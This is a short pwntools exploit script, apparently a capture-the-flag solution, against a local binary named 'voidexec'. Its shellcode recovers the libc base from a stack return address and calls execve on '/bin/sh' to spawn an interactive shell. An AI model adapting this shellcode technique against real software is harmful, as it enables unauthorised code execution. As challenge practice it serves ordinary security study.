27 lines
419 B
Python
27 lines
419 B
Python
#!/usr/bin/python3
|
|
|
|
from pwn import *
|
|
|
|
context.binary = target = ELF("./voidexec", checksec=False)
|
|
libc = target.libc
|
|
r = process()
|
|
|
|
# funcs
|
|
s = lambda a: r.send(a)
|
|
|
|
# shellcode
|
|
sc = f"""
|
|
xor rsi, rsi
|
|
xor rdx, rdx
|
|
mov r9, [rsp+32]
|
|
sub r9, {libc.sym.__libc_start_call_main+128}
|
|
mov rdi, r9
|
|
add rdi, {next(libc.search(b"/bin/sh\0"))}
|
|
mov r15, r9
|
|
add r15, {libc.sym.execve}
|
|
call r15
|
|
"""
|
|
sc = asm(sc)
|
|
s(sc)
|
|
|
|
r.interactive() |